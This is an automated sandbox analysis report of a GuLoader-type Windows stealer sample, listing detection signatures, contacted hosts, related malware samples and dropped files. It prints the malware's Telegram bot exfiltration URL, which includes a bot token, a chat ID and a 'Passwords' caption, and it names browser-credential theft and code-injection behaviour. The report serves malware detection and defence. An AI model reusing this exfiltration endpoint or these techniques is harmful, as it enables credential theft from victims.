            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576692 Sample: dP5z8RpEyQ.exe Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 36 api.telegram.org 2->36 38 drive.usercontent.google.com 2->38 40 3 other IPs or domains 2->40 46 Suricata IDS alerts for network traffic 2->46 48 Found malware configuration 2->48 50 Multi AV Scanner detection for submitted file 2->50 54 5 other signatures 2->54 10 dP5z8RpEyQ.exe 1 30 2->10         started        signatures3 52 Uses the Telegram API (likely for C&C communication) 36->52 process4 file5 28 C:\Users\user\AppData\...\Dyretmmeren.Lge, ASCII 10->28 dropped 58 Suspicious powershell command line found 10->58 14 powershell.exe 26 10->14         started        signatures6 process7 signatures8 60 Early bird code injection technique detected 14->60 62 Writes to foreign memory regions 14->62 64 Found suspicious powershell code related to unpacking or dynamic code loading 14->64 66 2 other signatures 14->66 17 msiexec.exe 16 8 14->17         started        21 conhost.exe 14->21         started        process9 dnsIp10 30 api.telegram.org 149.154.167.220, 443, 49867 TELEGRAMRU United Kingdom 17->30 32 checkip.dyndns.com 193.122.130.0, 49834, 80 ORACLE-BMC-31898US United States 17->32 34 2 other IPs or domains 17->34 42 Tries to harvest and steal browser information (history, passwords, etc) 17->42 44 Disables CMD prompt 17->44 23 reg.exe 1 1 17->23         started        signatures11 process12 signatures13 56 Disables the Windows registry editor (regedit) 23->56 26 conhost.exe 23->26         started        process14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            dP5z8RpEyQ.exe66%ReversingLabsWin32.Trojan.Guloader
            dP5z8RpEyQ.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://crl.microsoft5or0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            172.217.19.174
            truefalse
              high
              drive.usercontent.google.com
              142.250.181.1
              truefalse
                high
                api.telegram.org
                149.154.167.220
                truefalse
                  high
                  checkip.dyndns.com
                  193.122.130.0
                  truefalse
                    high
                    checkip.dyndns.org
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      http://checkip.dyndns.org/false
                        high
                        https://api.telegram.org/bot7559875433:AAFPRDQeuf2xqh2rMfCDkngFwDdieRNQbYs/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189false
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2628499104.00000000064B7000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://api.telegram.orgmsiexec.exe, 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2622978623.00000000055A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://api.telegram.org/botmsiexec.exe, 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://translate.google.com/translate_a/element.jsmsiexec.exe, 00000006.00000003.2731968974.0000000007A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2622978623.00000000055A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://contoso.com/Licensepowershell.exe, 00000002.00000002.2628499104.00000000064B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://contoso.com/Iconpowershell.exe, 00000002.00000002.2628499104.00000000064B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://drive.usercontent.google.com/msiexec.exe, 00000006.00000002.3284691137.00000000079F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2786541789.00000000079FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://checkip.dyndns.orgmsiexec.exe, 00000006.00000002.3296654914.0000000023663000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3296654914.000000002366F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://nsis.sf.net/NSIS_ErrorErrordP5z8RpEyQ.exefalse
                                                high
                                                https://api.telegram.org/bot7559875433:AAFPRDQeuf2xqh2rMfCDkngFwDdieRNQbYs/sendDocument?chat_id=7382msiexec.exe, 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2622978623.00000000055A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.google.commsiexec.exe, 00000006.00000003.2731968974.0000000007A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://nsis.sf.net/NSIS_ErrordP5z8RpEyQ.exefalse
                                                        high
                                                        http://crl.microsoft5orpowershell.exe, 00000002.00000002.2621900945.0000000003359000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://drive.google.com/msiexec.exe, 00000006.00000002.3284691137.000000000798A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://contoso.com/powershell.exe, 00000002.00000002.2628499104.00000000064B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2628499104.00000000064B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://aka.ms/pscore6lBjqpowershell.exe, 00000002.00000002.2622978623.0000000005451000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://drive.usercontent.google.com/:msiexec.exe, 00000006.00000003.2786541789.00000000079FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://apis.google.commsiexec.exe, 00000006.00000003.2731968974.0000000007A3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://checkip.dyndns.commsiexec.exe, 00000006.00000002.3296654914.000000002366F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://drive.usercontent.google.com/?msiexec.exe, 00000006.00000002.3284691137.00000000079F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2786541789.00000000079FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://api.telegram.orgmsiexec.exe, 00000006.00000002.3296654914.0000000023781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2622978623.0000000005451000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3296654914.00000000235F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://reallyfreegeoip.org/xml/msiexec.exe, 00000006.00000002.3296654914.000000002366F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              149.154.167.220
                                                                              api.telegram.orgUnited Kingdom
                                                                              62041TELEGRAMRUfalse
                                                                              142.250.181.1
                                                                              drive.usercontent.google.comUnited States
                                                                              15169GOOGLEUSfalse
                                                                              193.122.130.0
                                                                              checkip.dyndns.comUnited States
                                                                              31898ORACLE-BMC-31898USfalse
                                                                              172.217.19.174
                                                                              drive.google.comUnited States
                                                                              15169GOOGLEUSfalse
                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1576692
                                                                              Start date and time:2024-12-17 12:04:05 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 7m 10s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:9
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:dP5z8RpEyQ.exe
                                                                              renamed because original name is a hash value
                                                                              Original Sample Name:57a4244a8e2bdb2428fb0801c42f6c78af7ec0ef1b23bd558e01ecb61a1104b1.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@9/13@4/4
                                                                              EGA Information:
                                                                              • Successful, ratio: 66.7%
                                                                              HCA Information:
                                                                              • Successful, ratio: 96%
                                                                              • Number of executed functions: 103
                                                                              • Number of non-executed functions: 46
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                              • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.43
                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Execution Graph export aborted for target powershell.exe, PID 2780 because it is empty
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              • VT rate limit hit for: dP5z8RpEyQ.exe
                                                                              TimeTypeDescription
                                                                              06:04:56API Interceptor45x Sleep call for process: powershell.exe modified
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              149.154.167.220Ls4O6Pmixd.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                  193.122.130.0pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  AsyncClient.exeGet hashmaliciousAsyncRAT, HVNC, PureLog StealerBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • checkip.dyndns.org/
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  checkip.dyndns.comTEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 158.101.44.242
                                                                                                  MV GOLDEN SCHULTE DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 193.122.6.168
                                                                                                  PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  • 158.101.44.242
                                                                                                  pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 193.122.130.0
                                                                                                  HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 193.122.130.0
                                                                                                  hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 132.226.247.73
                                                                                                  PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  • 193.122.130.0
                                                                                                  Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 158.101.44.242
                                                                                                  pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 193.122.6.168
                                                                                                  QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  • 193.122.6.168
                                                                                                  api.telegram.orgLs4O6Pmixd.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  • 149.154.167.220
                                                                                                  pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  • 149.154.167.220
                                                                                                  PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 149.154.167.220
                                                                                                  l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 149.154.167.220
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  TELEGRAMRULs4O6Pmixd.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  • 149.154.167.220
                                                                                                  pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  69633f.msiGet hashmaliciousVidarBrowse
                                                                                                  • 149.154.167.99
                                                                                                  Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  • 149.154.167.220
                                                                                                  PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 149.154.167.220
                                                                                                  ORACLE-BMC-31898UShttps://machino.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                  • 152.67.3.57
                                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 158.101.44.242
                                                                                                  MV GOLDEN SCHULTE DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  • 193.122.6.168
                                                                                                  PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  • 158.101.44.242
                                                                                                  pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 193.122.130.0
                                                                                                  HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 193.122.130.0
                                                                                                  ldr.ps1Get hashmaliciousGO Miner, XmrigBrowse
                                                                                                  • 147.154.227.160
                                                                                                  PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  • 193.122.130.0
                                                                                                  end.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 130.61.86.87
                                                                                                  Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 158.101.44.242
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  3b5074b1b5d032e5620f69f9f700ff0eClienter.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                  • 149.154.167.220
                                                                                                  JkICQ13OOY.dllGet hashmaliciousUnknownBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Clienter.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                  • 149.154.167.220
                                                                                                  http://85off-lv.comGet hashmaliciousUnknownBrowse
                                                                                                  • 149.154.167.220
                                                                                                  V65xPrgEHH.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                  • 149.154.167.220
                                                                                                  fGZLZhXIt1.batGet hashmaliciousUnknownBrowse
                                                                                                  • 149.154.167.220
                                                                                                  greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                  • 149.154.167.220
                                                                                                  Ls4O6Pmixd.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 149.154.167.220
                                                                                                  V7giEUv6Ee.batGet hashmaliciousUnknownBrowse
                                                                                                  • 149.154.167.220
                                                                                                  37f463bf4616ecd445d4a1937da06e19hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 142.250.181.1
                                                                                                  • 172.217.19.174
                                                                                                  Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 142.250.181.1
                                                                                                  • 172.217.19.174
                                                                                                  sEOELQpFOB.lnkGet hashmaliciousRedLineBrowse
                                                                                                  • 142.250.181.1
                                                                                                  • 172.217.19.174
                                                                                                  ref095vq842r70_classement_atout_france.pdf.lnk.d.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                  • 142.250.181.1
                                                                                                  • 172.217.19.174
                                                                                                  PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  • 142.250.181.1
                                                                                                  • 172.217.19.174
                                                                                                  bxAoaISZJQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 142.250.181.1
                                                                                                  • 172.217.19.174
                                                                                                  ei0woJS3Dy.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 142.250.181.1
                                                                                                  • 172.217.19.174
                                                                                                  tz1WicW6sG.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 142.250.181.1
                                                                                                  • 172.217.19.174
                                                                                                  Assinar_PDF_3476.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 142.250.181.1
                                                                                                  • 172.217.19.174
                                                                                                  Sublabially.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  • 142.250.181.1
                                                                                                  • 172.217.19.174
                                                                                                  No context
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:modified
                                                                                                  Size (bytes):14744
                                                                                                  Entropy (8bit):4.992175361088568
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                                                                                  MD5:A35685B2B980F4BD3C6FD278EA661412
                                                                                                  SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                                                                                  SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                                                                                  SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                                                                                  Malicious:false
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Users\user\Desktop\dP5z8RpEyQ.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):346094
                                                                                                  Entropy (8bit):1.260238196149209
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:lwgDCzH44iLM/ndTaN9uR+pcg+N4stJqJQGW6HbVShdw3UKO6LtPNm9KEku6xUek:lwsCkEGLseQwu68ODL1lMpQN
                                                                                                  MD5:866E55601DA25A5CB6B40855B21CDA12
                                                                                                  SHA1:76E8A639D1EA07C03555F3143C5E1DBB1954598A
                                                                                                  SHA-256:1BA5AF6DF8DE3A9D9C4F63A5FE47933A4D5940778F35F31823CFDD9CE2941DC0
                                                                                                  SHA-512:721EDD042ED05E7A4D15D2B1C3200F3C5468AC67687589C12016332E6E2D7DF318AE0387E11968F2E6F2BC49AB0B3B52D6BCA7E853C31C06D90DB213667CC749
                                                                                                  Malicious:false
                                                                                                  Preview:.................................................................................................?..;.............................(....................".............................6..................W........._.........................................................................................._.......L...............................................J....._........+.................S...........+.................................0....................................................................>.........................&................W..................................Z..........................1.........................E.......................................................$..l.................................=..v.................i.................................................................y..............................................h.....................................t..........j........................E................................................=.............
                                                                                                  Process:C:\Users\user\Desktop\dP5z8RpEyQ.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):412942
                                                                                                  Entropy (8bit):1.2515095625023966
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:v0W4UWhkzhz2MaXndEMhRnCqiUOL21ezSGMHdRnsGho:vIk12Bdfhz421eeGS
                                                                                                  MD5:9F1A16425E1AC7217A1EAF772B60A1CE
                                                                                                  SHA1:D4AF081C4A2834718F86B7A3EAEA6A19B1B1CE40
